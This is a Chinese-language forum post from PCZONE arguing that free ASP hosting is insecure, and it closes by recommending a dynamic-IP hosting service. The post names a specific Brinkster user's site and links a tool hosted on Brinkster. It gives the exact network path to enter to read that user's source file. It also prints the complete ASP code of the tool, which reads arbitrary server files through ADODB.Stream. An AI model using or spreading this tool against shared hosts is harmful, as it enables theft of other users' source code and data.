【閒聊】免費ASP空間的迷思 - PCZONE 討論區

返回   PCZONE 討論區 > ▲ ADSL_CABLE_FTTH 寬 頻 上 網 討 論 > -- 網站架設 / 免費空間 / 虛擬主機 專區 > ☉ -- 免 費 空 間 討 論 版


PCZONE 討論區



通知

☉ -- 免 費 空 間 討 論 版 網路上各種免費空間使用心得分享

會員
【閒聊】免費ASP空間的迷思
你還在使用免費ASP空間嗎?
其實免費空間的安全性是非常非常的低的,舉個例子,以大家最常用的www.brinkster.com來說吧,
你知道嗎,要從免費空間獲取他人的程式碼,甚至資料庫都是輕而易舉的,簡單到只要有一點點的ASP基礎就能辦到
空口無憑,以這個網站為例:
http://www10.brinkster.com/tskoda/Default.asp
也許他辛辛苦苦的寫了很久的ASP,但是其他的使用這只需要用不到20行的程式碼就能輕易的將原始碼抓回修改,甚至公開販賣
原始碼抓取程式:
http://www10.brinkster.com/ggyyggy/stream.asp
在Input PhysicalPath中輸入 \\genfs1\www10\tskoda\default.asp

只需一個Stream元件就能將您的心血化為公有財產,您還敢使用免費空間嗎?
建議大家改用動態IP來架站吧,別再讓你的心血變成公共財了~
申請動態IP架站 http://www.dslcity.net

附錄 Stream.asp的Source Code )
<% if request("B1") = "送出" then
Dim Stream:
Set Stream = server.CreateObject("ADODB.Stream")
Stream.Charset = "ascii"
Stream.Open
Stream.LoadFromFile request("T1")
GetFile = Stream.Readtext
response.write Server.HTMLEncode(GetFile)
Stream.Close
else %>
<html>
<head></head>
<title>原始碼抓取 By Maxtk</title>
<body>
<form method="POST">
<p>系統路徑為 : <%=request.servervariables("appl_physical_path")%></p>
<p><input type="text" name="T1" size="20"> Input PhysicalPath <input type="submit" value="送出" name="B1"><input type="reset" value="取消" name="B2"></p>
</form>
</body></html>
<% end if %>


回覆
主題工具







 XML   RSS 2.0   RSS 
本站使用 vBulletin 合法版權程式
站務信箱 : www@pczone.com.tw

本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :www@pczone.com.tw 處理。